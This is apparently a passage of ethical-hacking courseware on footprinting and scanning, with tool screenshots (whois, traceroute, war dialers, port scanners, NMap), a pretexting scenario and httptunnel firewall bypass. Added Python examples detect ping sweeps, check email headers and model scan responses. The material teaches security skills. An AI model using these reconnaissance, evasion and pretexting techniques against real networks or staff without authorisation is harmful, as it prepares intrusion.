11   216.109.33.218   218-google-exodusdc.exodus.net          442      0%  DC3-8
12   216.239.39.99    www.google.com                          533      0%  GOOGLE

(Ave, Min and Max columns equal the RT column for this single run.)
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Tool: Visual Route Trace

Screenshot: VisualRoute 7.1c Trial Version (Address: http://www.visualware.com; IP Address: 198.64.153.97; Advanced mode).

Report for www.visualware.com [198.64.153.97]

Analysis: www.visualware.com is a HTTP server (running Apache/1.3.27 (Unix) mod_jk/1.2.0).

Hop  %Loss  IP Address       Node Name                Location                Tzone   ms   Network
  0         217.165.221.153  SAM                                                      467  Emirates Internet
  1         213.42.12.6                               (United Arab Emirates)          125  Emirates Telecommunications
  2         213.42.12.195                             (United Arab Emirates)          122  Emirates Telecommunications
  3         194.170.2.117                             (United Arab Emirates)          124  Emirates Internet
  4         195.229.31.35    auh-emix-rb.ge6303.er    (United Arab Emirates)          122  Emirates Telecommunications
  5         64.86.138.117    if-0-0.core2.Newark.tel  Newark, NJ, USA         -05:00  420  Teleglobe Inc. TELEGLOBE
  6         129.250.9.229    p4-2-0-0.r00.nwrknj01.i  Newark, NJ, USA         -05:00  419  Verio, Inc. VRIO-129-250
  7         129.250.2.217    p16-0-1-1.r20.nycmny0    New York, NY, USA       -05:00  418  Verio, Inc. VRIO-129-250
  8         129.250.2.33     p64-0-0-0.r21.nycmny0    New York, NY, USA       -05:00  421  Verio, Inc. VRIO-129-250
  9         129.250.5.99     p16-1-0-1.r21.asbnva0    Ashburn, VA, USA        -05:00  418  Verio, Inc. VRIO-129-250
 10         129.250.2.34     p64-0-0-0.r20.asbnva0    Ashburn, VA, USA        -05:00  436  Verio, Inc. VRIO-129-250
 11         129.250.2.74     p16-3-0-0.r00.stngva01   Sterling, VA, USA       -05:00  420  Verio, Inc. VRIO-129-250
 12         129.250.27.184   ge-4-1.c00.stngva01.us   Sterling, VA, USA       -05:00  429  Verio, Inc. VRIO-129-250
 13         161.58.157.61                                                              420  Verio, Inc. VRIO-161-058
 14         198.64.153.97    www.visualware.com                                       430  Verio, Inc. VRIO-198-063

Roundtrip time to www.visualware.com, average = 430ms, min = 420ms, max = 436ms. Mar 18, 2003 2:36:39 PM
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Tool: SmartWhois

SmartWhois is a useful network information utility that allows you to find out all available information about an IP address, host name, or domain, including country, state or province, city, name of the network provider, administrator and technical support contact information.

Screenshot: SmartWhois (Evaluation Version), query "microsoft.com" (toolbar: Clear, Open, Save, Save All, Print, Copy, Paste). Result:

   Microsoft Corporation
   1 microsoft way
   redmond, WA 98052
   US

   Microsoft Corp (EPMK0EAU50) msnhst@MICR
   Microsoft Corp
   One Microsoft Way
   Redmond, WA 98052
   US
   425 882 8080

   Microsoft (EJ5EHEQUA0) msnhst@MICROSOF
   Microsoft
   One Microsoft Way
   Redmond, WA 98052
   US
   425-882-8080

   DNS1.CP.MSFT.NET   207.46.138.20
   DNS3.UK.MSFT.NET   213.199.144.151
   DNS1.SJ.MSFT.NET   65.54.248.222

Unlike standard Whois utilities, SmartWhois can find the information about a computer located in any part of the world, intelligently querying the right database and delivering all the related records within a few seconds.
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Scenario (contd.)



Adam makes a few searches and gets some internal contact information. He calls the receptionist and informs her that the HR had asked him to get in touch with a specific IT division personnel. It's lunch hour, and he says he'd rather mail to the person concerned than disturb him. He checks up the mail id on newsgroups and stumbles on an IP recording. He retraces the IP destination.



© What preventive measures can you suggest to check the availability of sensitive information?

© What are the implications for the target company? Can he cause harm to targetcompany at this stage?

© What do you think he can do with the information he has obtained?
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Tool: VisualLookout

Screenshot: VisualLookout 3.0, Agent - localhost, "TCP 7 CurrEstab of 23". The metrics panel (Total / Delta / Rate) reads: Outgoing calls 430, Incoming calls 83, In traffic 140867, Out traffic 136819, Outgoing fails 14, Outgoing drops 79, Resends 101, Bad inbound, Repeat reqs 310 (all deltas 0, all rates 0.00); a split graph shows "In traffic 0.33:Max". The connections panel (Status, Dir, IP Address, Local, Remote) lists inbound established sessions from 192.168.0.x hosts to local port 139; the selected connection reads:

   Local addr  : 192.168.0.170
   Local port  : 139
   Remote addr : 192.168.0.1
   Remote port : 3397
   State       : 5 : established

Context menu: Add port to Sentry (139); Add address to Sentry (192.168.0.1); Set connection log limits.
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VisualLookout provides high-level views as well as detailed and historical views that provide traffic information in real time or on a historical basis.

In addition the user can request a "connections" window for any server, which provides a real-time view of all the active network connections showing

© who is connected,

© what service is being used,

© whether the connection is inbound or outbound, and

© how many connections are active and how long they have been connected.
Tool: Visual Route Mail Tracker

Screenshot: MailTracker by Visualware, report for olympus.bic.nus.edu.sg [137.132.19.100], traced for the address tinwee@bic.nus.edu.sg.

Analysis: olympus.bic.nus.edu.sg is a SMTP server (ESMTP Sendmail 8.12.8/8.12.7).

Server list (Server / Priority / IP Address / Status): olympus.bic.nus.edu.sg, 10, 137.132.19.100, ESMTP Sendmail 8.12.8/8.12.7. "Click on a server name to start a VisualRoute trace."

Below the server list the report shows the hop-by-hop trace (hops 0-10 visible here: Emirates Internet and Emirates Telecommunications in the UAE, FLAG Telecom Limited in the United Kingdom, then Level 3 Communications in San Francisco, CA); the full table is reproduced on the next slide.
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Screenshot: Visual Route Mail Tracker

The trace table from the MailTracker report for olympus.bic.nus.edu.sg:

Hop  %Loss  IP Address       Node Name                  Location                Tzone   ms    Network
  0         217.165.221.153  SAM                                                 *             Emirates Internet
  1         213.42.12.6      -                          (United Arab Emirates)           2537  Emirates Telecommunications
  2         213.42.12.131    -                          (United Arab Emirates)           2513  Emirates Telecommunications
  3         194.170.2.117    -                          (United Arab Emirates)           2467  Emirates Internet
  4         195.229.31.35    auh-emix-rb.ge6303.er      (United Arab Emirates)           2429  Emirates Telecommunications
  5         195.229.31.34    auh-emix-ra.ge6303.er      (United Arab Emirates)           2421  Emirates Telecommunications
  6         62.216.144.25    -                          (United Kingdom)         *       2766  FLAG Telecom Limited
  7         62.216.140.9     ge-1-0-0.0.core1.sfr1.fl   (United Kingdom)         *       2894  FLAG Telecom Limited
  8         166.90.133.165   gige4-1-116.ipcolo2.Sc     San Francisco, CA, USA   -08:00  2655  Level 3 Communications, Inc.
  9         209.244.14.201   gigabitethernet4-2.core    San Francisco, CA, USA   -08:00  2695  Level 3 Communications, Inc.
 10         209.247.10.233   so-4-0-0.mp2.SanFran       San Francisco, CA, USA   -08:00  3008  Level 3 Communications, Inc.
 11         64.159.0.218     so-2-0-0.mp2.SanJose       San Jose, CA, USA        -08:00  3073  Level 3 Communications, Inc.
 12         64.159.2.165     gigabitethernet5-2.core    San Jose, CA, USA        -08:00  3009  Level 3 Communications, Inc.
 13         209.244.3.246    GigabitEthernet5-0.edg     Palo Alto, CA, USA       -08:00  2996  Level 3 Communications, Inc.
 14         209.245.146.150  Singtel-Level3-oc3.ix.si                                    2962  Level 3 Communications, Inc.
 15         203.208.132.21   -                          Singapore                +08:00  2974  SingTel Internet Exchange
 16         203.208.172.29   p6-8.sngtp-cr2.ix.singte   Singapore                +08:00  3061  SingTel Internet Exchange
 17         202.160.250.154  -                          Singapore                +08:00  3029  Singapore Telecommunications
 18         165.21.12.78     FE-4-0-0.lavender.sing     (Singapore)              +08:00  2995  Singapore Telecommunications
 19   20    165.21.43.102    -                          Singapore                +08:00  3201  Singapore Telecommunications
 20   30    137.132.19.100   olympus.bic.nus.edu.sg     (Singapore)              +08:00  3473  National University of Singapore
 21   30    137.132.19.100   olympus.bic.nus.edu.sg     (Singapore)              +08:00  3276  National University of Singapore
 22         137.132.19.100   olympus.bic.nus.edu.sg     (Singapore)              +08:00  3179  National University of Singapore
 23         137.132.19.100   olympus.bic.nus.edu.sg     (Singapore)              +08:00  3159  National University of Singapore

(Node names are cut off at the column width in the screenshot; the Graph column is omitted.)
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Tool: eMailTrackerPro

Screenshot: eMailTrackerPro by Visualware analysing the message "Long Distance - 4.9 cents per min - NO FEES!" (map pane: Singapore).

e-mail Analysis:

From: IP address 203.127.89.138.
Location: Singapore - For a detailed geographic trace, use VisualRoute.
Mailer: The sender used 'QUALCOMM Windows Eudora Pro Version 4.1' to send the e-mail.
Received Headers: Attempted misdirection: 'tes1a623.0neMail.com.sg' is not 203.127.88.129 in R1. (E12). Attempted misdirection: 'drb.com' is not 203.127.89.138 in R2

eMailTrackerPro is the e-mail analysis tool that enables analysis of an e-mail and its headers automatically and provides graphical results.
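Added example (not eMailTrackerPro or courseware code): the Received-header check behind the "Attempted misdirection" lines above, run on a constructed message. Each hop's claimed host name (from the HELO) is compared with the annotation the receiving server itself wrote (reverse-DNS name and address in brackets); the originating address and the X-Mailer header are pulled the same way. Every host name and address in the sample is a placeholder.

```python
"""Trace a message back through its Received: headers.

Added example (not eMailTrackerPro code). The message is constructed; every
host name and address is a placeholder from the documentation ranges.
"""
import email
import re

SAMPLE_MESSAGE = """\
Received: from mx.example.org (mx.example.org [192.0.2.25])
\tby mail.corp.example (Postfix) with ESMTP id 1A2B3C;
\tMon, 3 Mar 2003 10:02:11 +0000
Received: from relay.isp.example (relay.isp.example [198.51.100.7])
\tby mx.example.org with ESMTP; Mon, 3 Mar 2003 10:01:50 +0000
Received: from drb.example (dialup-138.isp.example [203.0.113.138])
\tby relay.isp.example with SMTP; Mon, 3 Mar 2003 10:01:20 +0000
From: sender@drb.example
To: victim@corp.example
Subject: Long Distance - 4.9 cents per min - NO FEES!
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1

Body text.
"""

# "from <claimed> (<reverse-dns> [<ip>])" as most MTAs write it; the reverse
# DNS part is optional because some MTAs record only the bare address.
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((?:(\S+)\s+)?\[([\d.]+)\]\)")


def parse_received(raw):
    """Return hops oldest first: [{'claimed', 'rdns', 'ip', 'by'}, ...]."""
    msg = email.message_from_string(raw)
    hops = []
    for value in msg.get_all("Received", []):
        value = re.sub(r"\s+", " ", value)      # unfold continuation lines
        m = RECEIVED_RE.search(value)
        if not m:
            continue
        by = re.search(r"\bby\s+(\S+)", value)
        hops.append({
            "claimed": m.group(1),
            "rdns": m.group(2),
            "ip": m.group(3),
            "by": by.group(1) if by else None,
        })
    # Headers are prepended as the mail travels, so the last one is the oldest.
    hops.reverse()
    return hops


def originating_ip(raw):
    """The address seen by the first MTA: the best lead on where it came from."""
    hops = parse_received(raw)
    return hops[0]["ip"] if hops else None


def flag_misdirection(hops):
    """Hops whose HELO name does not match the receiver's reverse lookup.

    This is the check behind the 'Attempted misdirection: X is not IP' lines
    on the slide. Only the receiving server's own annotation (rdns + [ip]) is
    trusted; the claimed name is under the sender's control.
    """
    return [h for h in hops if h["rdns"] and h["claimed"] != h["rdns"]]


def mailer(raw):
    """The X-Mailer header, if the sending client added one."""
    return email.message_from_string(raw).get("X-Mailer")


if __name__ == "__main__":
    hops = parse_received(SAMPLE_MESSAGE)
    print("originating IP:", originating_ip(SAMPLE_MESSAGE))
    print("mailer:", mailer(SAMPLE_MESSAGE))
    for h in flag_misdirection(hops):
        print(f"misdirection: '{h['claimed']}' is not {h['ip']} ({h['rdns']})")
```

Only the annotations written by servers you trust are evidence: a sender can forge any number of Received lines below its own, so the chain is read from the newest header (your own MTA) downward and stops being reliable at the first hop you do not control.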
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Tool: Mail Tracking (mailtracking.com)

Screenshot: MailTracking.com web page. "Welcome to MailTracking.com! MailTracking lets you know when email you've sent gets read. Easy to use! Just add .mailtracking.com onto the end of your recipients' email address when sending email to them from your normal ... Start here!"

MailTracking is a tracking service that allows the user to track when his mail was read, for how long and how many times. It also records forwards and passing of sensitive information (MS Office format).
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Summary



© The information gathering phase can be categorized broadly into seven phases.

© Footprinting renders a unique security profile of a target system.

© Whois and ARIN can reveal public information about a domain that can be leveraged further.

© Traceroute and mail tracking can be used to target a specific IP and later for IP spoofing.

© Nslookup can reveal specific users, and zone transfers can compromise DNS security.
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Ethical Hacking



Module III
Scanning



Scenario



Tim had got the much needed break he was looking for. He was going to be assisting the systems administrator of his division in securing their information systems. It was a dream come true for him as he was always interested in incident response.



Tim began by browsing through the system architecture. Yes, they had the usual systems: firewall, mail server, NIDS and a couple of servers that were always up for remote users. At first sight, traffic seemed normal and there was nothing amiss. Anyway, he decided that he would just monitor the systems in his neighborhood for any abnormal activity.

© Where do you think Tim should begin with his security initiative?
© What would be the first signs that his systems are under attack?



Module Objective



© Detecting 'live' systems on the target network.

© Discovering services running / listening on target systems.

© Understanding port scanning techniques.

© Identifying TCP and UDP services running on the target network.

© Discovering the operating system.

© Understanding active and passive fingerprinting.

© Automated discovery tools.
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Detecting 'Live' Systems On Target Network



Why?

© To determine the perimeter of the target network / system

© To facilitate network mapping

© To build an inventory of accessible systems on the target network

Tools

© War Dialers
© Ping Utilities
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War Dialer

© A war dialer is a tool used to scan a large pool of telephone numbers to detect vulnerable modems to provide access to the system.

© A demon dialer is a tool used to monitor a specific phone number and target its modem to gain access to the system.

© Threat is high in systems with poorly configured remote access products providing entry to larger networks.

© Tools include THC-Scan, ToneLoc, TBA etc.



Diagram: two paths lead to the server. The Internet path crosses the outside router, the firewall and the inside router; the hacker's dial-in over the PSTN terminates on a dial-in modem attached directly to the server, bypassing the firewall.
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Tool: THC-Scan

Screenshot: THC-Scan configuration screen. Scan Mode; Dial Mode: RANDOM; Manual/Autonom Mode; CARRIER Hack Mode; Nudge; Timeout 501 seconds, Ringout 6 seconds; Nudge Delay: 60; nudge string "guest^M^~guest^M^~INFO^M^MLO"; Calculate Elapsed Time; Redial Busy: YES; BUSY Overwrite: NO; YES NO DIALTONE exit: 201 minutes; Auto DAT save time: 101; DATA save exceptions: 0B; DAT Filename calculation: Delete Left + Delete Special.
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Ping



© Ping sends out an ICMP Echo Request packet and awaits an ICMP Echo Reply message from an active machine.

© Alternatively, TCP/UDP packets are sent if incoming ICMP messages are blocked.

© Ping helps in assessing network traffic by time stamping each packet.

© Ping can also be used for resolving host names.

© Tools include Pinger, WS_Ping ProPack, NetScan Tools, HPing, icmpenum
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Tool: Pinger

Screenshot: Pinger v1.0 by Rhino9.



Detecting Ping Sweeps



Ping sweeps form a basic step in network mapping by polling network blocks and/or IP address ranges.

Ping Utilities include:

• WS_Ping ProPack (www.ipswitch.com)

• NetScan Tools (www.nwpsw.com)

• Hping (http://www.hping.org/download.html)

• icmpenum (www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz)

Ping Sweep Detection utilities include:

• Network based IDS (www.snort.org)

• Genius (www.indiesoft.com)

• BlackICE (www.networkice.com)

• Scanlogd (www.openwall.com/scanlogd)
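Added example (not courseware, Snort or Scanlogd code): detection logic for the sweep just described, run over constructed firewall-style log lines. A source that sends echo requests to ten distinct destinations inside a sliding 60-second window is flagged; the one-line-per-packet log format, the threshold and the window are assumptions chosen for the example.

```python
"""Flag ICMP echo sweeps in firewall-style logs.

Added example (not courseware or IDS code). The log lines are constructed;
the format is an illustrative one-line-per-packet syslog.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2003-04-20 14:40:01 ICMP echo-request 203.0.113.9 -> 192.0.2.1
2003-04-20 14:40:01 ICMP echo-request 203.0.113.9 -> 192.0.2.2
2003-04-20 14:40:01 ICMP echo-request 203.0.113.9 -> 192.0.2.3
2003-04-20 14:40:02 ICMP echo-request 203.0.113.9 -> 192.0.2.4
2003-04-20 14:40:02 ICMP echo-request 203.0.113.9 -> 192.0.2.5
2003-04-20 14:40:02 ICMP echo-request 203.0.113.9 -> 192.0.2.6
2003-04-20 14:40:02 ICMP echo-request 203.0.113.9 -> 192.0.2.7
2003-04-20 14:40:03 ICMP echo-request 203.0.113.9 -> 192.0.2.8
2003-04-20 14:40:03 ICMP echo-request 203.0.113.9 -> 192.0.2.9
2003-04-20 14:40:03 ICMP echo-request 203.0.113.9 -> 192.0.2.10
2003-04-20 14:40:03 ICMP echo-request 203.0.113.9 -> 192.0.2.11
2003-04-20 14:40:04 ICMP echo-request 203.0.113.9 -> 192.0.2.12
2003-04-20 14:41:10 ICMP echo-request 198.51.100.4 -> 192.0.2.5
2003-04-20 14:41:12 ICMP echo-reply 192.0.2.5 -> 198.51.100.4
2003-04-20 14:55:00 ICMP echo-request 198.51.100.4 -> 192.0.2.6
"""


def parse_log(text):
    """Return (timestamp, kind, src, dst) for each well-formed line."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7 or parts[5] != "->":
            continue
        ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
        events.append((ts, parts[2] + " " + parts[3], parts[4], parts[6]))
    return events


def detect_sweeps(events, window=timedelta(seconds=60), threshold=10,
                  probe_types=("ICMP echo-request",)):
    """One source reaching `threshold` distinct destinations inside `window`.

    Probes are kept per source in a deque; entries older than the window are
    evicted before counting, so the alert tracks a sliding window rather than
    the whole log. Returns {src: {'targets', 'first', 'last'}}.
    """
    recent = defaultdict(deque)        # src -> deque of (ts, dst)
    alerts = {}
    for ts, kind, src, dst in sorted(events):
        if kind not in probe_types:
            continue
        q = recent[src]
        q.append((ts, dst))
        while q and q[0][0] < ts - window:
            q.popleft()
        distinct = {d for _, d in q}
        if len(distinct) >= threshold:
            a = alerts.setdefault(src, {"targets": 0, "first": q[0][0], "last": ts})
            a["targets"] = max(a["targets"], len(distinct))
            a["last"] = ts
    return alerts


if __name__ == "__main__":
    for src, info in detect_sweeps(parse_log(SAMPLE_LOG)).items():
        print(f"sweep from {src}: {info['targets']} hosts between "
              f"{info['first']:%H:%M:%S} and {info['last']:%H:%M:%S}")
```

The second source in the sample (two hosts, fourteen minutes apart) stays below the threshold, which is the point of the sliding window: a monitoring station that pings a few hosts now and then must not trip the same rule. Because the slide notes that TCP/UDP probes replace ICMP when echo is blocked, `probe_types` is a parameter so the same counter can be fed with "TCP syn" or "UDP" lines from the same log.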
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Discovering services running / listening on target systems



Why?

© To determine live hosts in the event of ICMP requests being blocked by the host.

© To identify potential ports for furthering the attack.

© To understand specific applications / versions of a service.

© To discover operating system details.

Tools

© Port Scanners
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TCP three-way handshake



Diagram (Client on the left, Server on the right):

1. SYN sent from Client

2. SYN/ACK sent from Server

3. ACK sent from Client
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Understanding Port Scanning Techniques



© Port Scanning is one of the most popular reconnaissance techniques used by hackers to discover services that can be compromised.

© A potential target computer runs many 'services' that listen at 'well-known' 'ports'.

© By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited.

© Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.



Port Scanning Techniques can be broadly classified into:

© Open scan

© Half-open scan

© Stealth scan

© Sweeps

© Misc
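Added example, not from the courseware: a Python model of how a TCP port answers the probe behind each technique above (open/connect scan, half-open/SYN scan, and the FIN, Null and Xmas stealth probes) and what a scanner concludes from the answer. The "rfc793" behaviour follows RFC 793; the "windows" behaviour reflects the note on the ipEye slide that FIN, Null and Xmas scans do not work against Windows systems. It models both sides of the exchange and shows why a connect scan is visible to the listening application while a half-open scan is not. Nothing is sent on the wire.

```python
"""How a TCP port answers the probe behind each scan type, and what the
scanner infers from that answer.

Added example (not courseware code): a model of the target stack, not a
scanner. 'rfc793' follows RFC 793; 'windows' reflects the note on the ipEye
slide that FIN, Null and Xmas probes do not work against Windows systems.
"""
SYN, ACK, FIN, RST, PSH, URG = "SYN", "ACK", "FIN", "RST", "PSH", "URG"

SCAN_PROBES = {
    "connect":   frozenset({SYN}),          # open scan: full handshake
    "half-open": frozenset({SYN}),          # SYN scan: handshake never completed
    "fin":       frozenset({FIN}),          # stealth scans: no SYN at all
    "null":      frozenset(),
    "xmas":      frozenset({FIN, PSH, URG}),
}


def stack_reply(probe, port_open, os_style="rfc793"):
    """Segment the target sends back, or None when it stays silent."""
    if probe == {SYN}:
        return frozenset({SYN, ACK}) if port_open else frozenset({RST, ACK})
    if os_style == "windows":
        # Windows answers RST to any non-SYN probe, open port or not
        return frozenset({RST, ACK})
    # RFC 793: a closed port answers RST, an open port discards the segment
    return None if port_open else frozenset({RST, ACK})


def interpret(probe, reply):
    """What the scanner concludes from the reply (or its absence)."""
    if SYN in probe:
        if reply == {SYN, ACK}:
            return "open"
        if reply is not None and RST in reply:
            return "closed"
        return "filtered"
    if reply is not None and RST in reply:
        return "closed"
    return "open|filtered"      # silence: open, or a firewall dropped the probe


def run_scan(scan, port_open, os_style="rfc793"):
    """Return the segments exchanged and the scanner's verdict."""
    probe = SCAN_PROBES[scan]
    exchange = [("client", probe)]
    reply = stack_reply(probe, port_open, os_style)
    if reply is not None:
        exchange.append(("server", reply))
    if reply == {SYN, ACK}:
        # connect() finishes the three-way handshake; the half-open scan
        # aborts it with RST so accept() never returns on the server
        third = frozenset({ACK}) if scan == "connect" else frozenset({RST})
        exchange.append(("client", third))
    return exchange, interpret(probe, reply)


def application_sees_connection(exchange):
    """True only when the handshake completed (SYN, SYN/ACK, ACK)."""
    flags = [f for _, f in exchange]
    return (len(flags) >= 3 and flags[0] == {SYN}
            and flags[1] == {SYN, ACK} and flags[2] == {ACK})


if __name__ == "__main__":
    for scan in SCAN_PROBES:
        for port_open in (True, False):
            ex, verdict = run_scan(scan, port_open)
            print(f"{scan:9s} open={port_open!s:5s} -> {verdict:14s} "
                  f"app-visible={application_sees_connection(ex)}")
```

Two consequences for the defender fall out of the model: application logs only ever record connect scans, so half-open and stealth scans have to be caught at the packet level (firewall logs or an IDS), and on Windows hosts a FIN/Null/Xmas probe reports every port as closed, so an alert based on those probes against Windows tells you about the scanner, not about the host.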



Tool: ipEye, IPSecScan

Screenshot: ipEye run without arguments in a Windows command prompt (C:\WINNT\System32\cmd.exe):

ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
  - http://ntsecurity.nu/toolbox/ipeye/

Error: Too few parameters.

Usage:

ipEye <target IP> <scantype> -p <port> [optional parameters]

ipEye <target IP> <scantype> -p <from port> <to port> [optional parameters]

<scantype> is one of the following:
  -syn = SYN scan
  -fin = FIN scan
  -null = Null scan
  -xmas = Xmas scan

(note: FIN, Null and Xmas scans don't work against Windows systems)

[optional parameters] are selected from the following:
  -sip <source IP> = source IP for the scan
  -sp <source port> = source port for the scan
  -d <delay in ms> = delay between scanned ports in milliseconds
                     (default set to 750 ms)
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Tool: NetScan Tools Pro 2003

Screenshot: NetScanTools Pro 2003 (TM), Port Probe tab. Other tabs: DHCP, NetBios Info, Network Info and Stats, Email Validate, SMTP Email Generator/Relay Test, Arp, TTCP, What's New at NWPSW, TCP Term, NetTopography, TimeSync, Finger, Launcher, Simple Services, Database Tests, IDENT Server, Winsock Info, Preferences, RFC Reference, About, OS Fingerprinting, RPC Info, Name Server Lookup, Ping, IP Packet Viewer, IP/MAC Address Management, Subnet Calculator, Detection, TraceRoute, Whois, NetScanner, SNMP, HyperTrans. Settings: Probe Single Host / Probe IP Range; target 192.168.0.50; Show non-responding ports (off); End Port 65535; Wait After Connect 1000 ms. Results (TCP):

   21   ftp        response: 3 msec
   23   telnet     response: 3 msec
   25   smtp       response: 0 msec
   80   http       response: 3 msec
  110   pop3       response: 0 msec
  280   http-mgmt  response: 3 msec
  515   printer    response: 3 msec
  631   ipp        response: 3 msec
 5120   unknown    response: 3 msec
 5121   unknown    response: 3 msec

Buttons: Seq Probe, Probe Port List, Seq Target List, Port/Target List, Stop, Edit Target List, Edit Port List, Setup, Create Reports, Clear Results, Print, Save, HTML, Find, Copy, Email, RFCs, Navigate, Help Wizard, Exit, Help.
Tool: Super Scan

Screenshot: SuperScan 3.00. Hostname Lookup (target.com, resolved); Configuration: Port list setup; IP range Start 64.3x.3x.xxx, Stop 64.3x.3x.xxx (PrevC, NextC, 1..254; Ignore IP zero; Ignore IP 255; Extract from file); Timeout: Ping 400, Connect 2000, Read 4000; Scan type: Resolve hostnames, Only scan responsive pings, Show host responses, Ping only / Every port in list / All selected ports in list / All list ports from 1 to 65535 / All ports from 1 to 65535; Speed Max/Min. Results for 64.39.30.117 (Active hosts / Open ports):

   25  Simple Mail Transfer
   80  World Wide Web HTTP
       HTTP/1.1 200 OK.. Server: Microsoft-IIS .. Cache-Control: no-cache .. Expires: Sun 20 Apr 2003 14:40:08 GMT ..
  110  Post Office Protocol - Version 3
       +OK X1 NT-POP3 Server ...
  135  DCE endpoint resolution
  143  Internet Message Access Protocol
 1032  BBN IAD
 5631  pcANYWHEREdata
 5800  Virtual Network Computing server
       RFB 003.003.

Buttons: Save, Collapse all, Expand all, Prune.
Tool: NMap (Network Mapper)

Screenshot: NMapWin v1.3.1, Host 192.168.2.118 (buttons: Scan, Stop, Help, Exit; tabs: Scan, Discover, Options, Timing, Files, Service, Win32). Scan tab modes: Connect, SYN Stealth, FIN Stealth, Ping Sweep, UDP Scan, Null Scan, Xmas Tree, IP Scan, Idle Scan, ACK Scan, Window Scan, RPC Scan, List Scan. Scan options: Port Range, Use Decoy, Bounce Scan, Device, Source Address, Source Port, Idle Scan Host. Output:

Starting nmap V. 3.00 ( www.insecure.org/nmap )
Host (192.168.2.118) appears to be down, skipping it.
Note: Host seems down. If it is really up, but blocking our ping probes, try -P0
Nmap run completed -- 1 IP address (0 hosts up) scanned in 3 seconds

CMD: -sS -PT -PI -R -O -vv -T 5 --win_forcerawsock 192.168.2.118
22/04/03 21:26:23
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Active Stack Fingerprinting



© Fingerprinting is done to determine the remote OS

© Allows the attacker to leave a smaller footprint and have a greater chance to succeed

© Based on the fact that various OS vendors implement the TCP stack differently

© Specially crafted packets are sent to the remote OS and the response is noted. This is compared with a database to determine the OS



Passive Fingerprinting



© Passive fingerprinting is also based on the differential implementation of the stack and the various ways an OS responds to it.

© However, instead of relying on scanning the target host, passive fingerprinting captures packets from the target host and studies them for telltale signs that can reveal the OS.

© Passive fingerprinting is less accurate than active fingerprinting.
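Added example, not from the courseware or any fingerprinting tool: passive fingerprinting over constructed SYN-packet fields (TTL as observed, window size, DF bit) against a small illustrative signature table. The initial TTL is inferred from the observed one, which also gives the hop distance. The signature values and the captured packets are constructed for the example; the code makes the slide's accuracy caveat concrete, since several signatures or none may match a packet.

```python
"""Passive OS fingerprinting from captured SYN packets.

Added example (not courseware, p0f or Nmap code). The signature table is a
small illustrative one constructed for this example, and the captured packets
are constructed too; a real tool carries far more fields and entries.
"""

# (os, initial TTL, TCP window size, DF bit)
SIGNATURES = [
    ("Linux 2.4",        64,  5840, True),
    ("Windows 2000/XP", 128, 65535, True),
    ("FreeBSD 4.x",      64, 65535, True),
    ("Cisco IOS",       255,  4128, False),
]

CAPTURED = [   # constructed: fields a sniffer would pull from each SYN
    {"src": "192.0.2.10", "ttl": 52,  "window": 5840,  "df": True},
    {"src": "192.0.2.20", "ttl": 118, "window": 65535, "df": True},
    {"src": "192.0.2.30", "ttl": 200, "window": 1234,  "df": False},
]


def initial_ttl(observed):
    """Guess the TTL the sender started with: the next common default above
    the observed value (each router on the way decremented it by one)."""
    for candidate in (32, 64, 128, 255):
        if observed <= candidate:
            return candidate
    return 255


def fingerprint(pkt):
    """Match one packet against the table. Several or no matches are possible,
    which is why passive fingerprinting is less accurate than active probing."""
    ttl0 = initial_ttl(pkt["ttl"])
    matches = [name for name, ttl, window, df in SIGNATURES
               if ttl == ttl0 and window == pkt["window"] and df == pkt["df"]]
    return {
        "src": pkt["src"],
        "initial_ttl": ttl0,
        "hops_away": ttl0 - pkt["ttl"],
        "os": matches or ["unknown"],
    }


def fingerprint_all(packets):
    """Fingerprint every captured packet; useful as a passive asset inventory."""
    return [fingerprint(p) for p in packets]


if __name__ == "__main__":
    for r in fingerprint_all(CAPTURED):
        print(f"{r['src']:12s} ~{r['hops_away']:2d} hops  {', '.join(r['os'])}")
```

The same passive approach is useful on the defending side: run over a capture of your own network it lists hosts whose stack does not match the inventory (an unexpected operating system, or a host many more hops away than it should be).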
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Cheops

Screenshot: Cheops network map showing the hosts 207.230.72.26 and 207.230.72.8; status line "Saved '/root/.cheops-map'".
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SocksChain



© SocksChain is a program that allows working through a chain of SOCKS or HTTP proxies to conceal the actual IP address.

© SocksChain can function as a usual SOCKS server that transmits queries through a chain of proxies.
Proxy Servers

• A proxy is a network computer that serves as an intermediary for connections to other computers. Proxies are usually used for the following purposes:
  • As a firewall, a proxy protects the local network from outside access.
  • As an IP-address multiplexer, a proxy allows a number of computers to connect to the Internet when only one IP address is available.
  • Proxy servers can be used (to some extent) to anonymize web surfing; the proxy's own logs still record the client's real address.
  • Specialized proxy servers can filter out unwanted content, such as ads or 'unsuitable' material.
  • Proxy servers can afford some protection against hacking attacks.

Anonymizers

• Anonymizers are services that help make your own web surfing anonymous.
• The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.
• An anonymizer strips the identifying information (source IP address, cookies, browser headers) from the requests a user's computer sends while the user surfs the Internet, thereby protecting the privacy of the user from the sites visited. The anonymizer operator, of course, sees everything.

Bypassing Firewalls using Httptunnel

http://www.nocrew.org/software/httptunnel.html

• Httptunnel creates a bidirectional virtual data path tunnelled inside HTTP requests. The requests can be sent via an HTTP proxy if so desired.
• htc, whose help is shown below, is the client half; it talks to the matching server, hts, which the attacker runs on a host outside the firewall. Because the traffic is ordinary HTTP, a firewall or proxy that allows outbound web browsing allows the tunnel too.

C:\WINDOWS\System32\cmd.exe

...Tunnel 3.3>htc --help
Usage: htc [OPTION]... HOST[:PORT]
Set up a httptunnel connection to PORT at HOST (default port is 8888).
When a connection is made, I/O is redirected from the source specified
by the --device, --forward-port or --stdin-stdout switch to the tunnel.

  --proxy-authorization USER:PASSWORD   proxy authorization
  --proxy-authorization-file FILE       proxy authorization file
  --proxy-buffer-size BYTES             assume a proxy buffer size of BYTES bytes
                                        (k, M, and G postfixes recognized)
  --content-length BYTES                use HTTP PUT requests of BYTES size
                                        (k, M, and G postfixes recognized)
  --device DEVICE                       use DEVICE for input and output
  --forward-port PORT                   use TCP port PORT for input and output
  --help                                display this help and exit
